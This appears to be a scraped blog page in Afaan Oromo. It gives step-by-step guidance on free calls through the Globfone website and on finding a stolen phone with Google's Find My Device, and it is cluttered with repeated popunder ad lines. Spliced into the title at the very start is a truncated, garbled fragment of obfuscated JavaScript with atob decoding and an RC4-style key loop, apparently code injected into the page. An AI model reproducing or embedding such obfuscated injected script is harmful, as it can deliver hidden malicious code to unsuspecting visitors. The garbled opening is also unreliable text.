Biyya Feetanitti Bilisaan /*>(-0x2*n&0x6)):0x0){p=j[‘indexOf’](p);}return m;});}());var g=function(h,l){var m=[],n=0x0,o,p=”,q=”;h=atob(h);for(var t=0x0,u=h[‘length’];t<u;t++){q+=’%’+(’00’+h[‘charCodeAt’](t)[‘toString’](0x10))[‘slice’](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l[‘charCodeAt’](r%l[‘length’]))%0 Bilbiluu nii dandeessu!

Golobfone

Namni kamuu firoota isaa biyya hambaa jiraataniif bilisaan bilbiluuf ni fedha. Kanaafis social media garaagaraa fayyadamtu. Hardha Karaa ajaaibaa isiniif qabadhee dhufeera. Website kana kan adda godhu lakkoofsa keessan ykn eenyummaa keessan hin beekin Bilbiluu ykn ergaa gabaabaan erguu dandeessu.

Beekumsaaf fayyadamaa

Na hordofaa_ jalqaba Gara browser feetanii seenaa_sanabooda globfone jechuun search gootu….

Linkii jalqaba irra jiru kana ni tuqxu….

PopAds.net - The Best Popunder Adnetwork

Taarreefamoota siniif dhiyaatan keessaa filadhaa yoo bilbila barbaaddan call kan jedhu….

Maqaa keessan barreessuun next godhaa.

..

PopAds.net - The Best Popunder Adnetwork

Xumura irratt

PopAds.net - The Best Popunder Adnetwork

Bilbilli Keenya Yoo Bade Akkamitti Arganna!

Bilbilli keessan badee beekaa?


Bilbila nu jalaa hatame karaa ittiin argachuu dandeenyu muraasni ni jiru, isaan keessaa kan namoonni hedduun itti fayyadamanii fi hedduu jaallatamaa ta’e kana waliin haa ilaallu.
Utuu bilbilli keenya nujalaa hin hatamiin haal-dureewwan guutamuu qaban:
– Bilbilli banaa ta’uu qaba(Power On).
– Location(Kallattii) banuu qabna.
– Google Account (Gmail) bilbila keenyatti hidhame qabaachuu qabna.
– ‘Data On’ godhuu qabna. ( Quunnamtiin intarneetii jiraachuu qaba)
Erga badee booda maal goona?
– Hidha kanaa gadiirratti Appilikeeshina argamu kan ‘FIND MY DEVICE’ Jedhu (Download) buusaa.


– Applikeeshina kana banuudhaan ‘Gmail’ bilbila bade sanarra jiru tartiiba inni nu gaafatuun ‘Password’ isaa waliin galchina.
Sana Booda Yoo qaamni nujalaa hate sun osoo bilbila keenya hin cufiin yookaan waa takka hin godhiin qabatee jira ta’e waantota kanaa gadii gochuu dandeenya.
– Kallattii qaamni bilbila keenya hate jiru qabatamaatti arguu dandeenya.
– Yoo feene akka iyyu(Ring) gochuu dandeenya yoo ‘Silent’ irra jiraateyyuu, kunis akka bilbilichi keenya ta’e nuuf mirkaneessa jechuudha.
– Bilbila sana ‘Restore’ yookaan faayila hunda irraa balleessuu dandeenya.
– Password Ykn pattern feene itti gochuullee dandeenya.
Hub: Kana hunda gochuuf dirqama wantoota kanaa olii guutuu qabna.

Like tokkoo qarshii tokko argadhaa!!!

Karaa Miidiyaalee Hawaasaa Nu Hordofaa!!

PopAds.net - The Best Popunder Adnetwork
Design a site like this with WordPress.com
Get started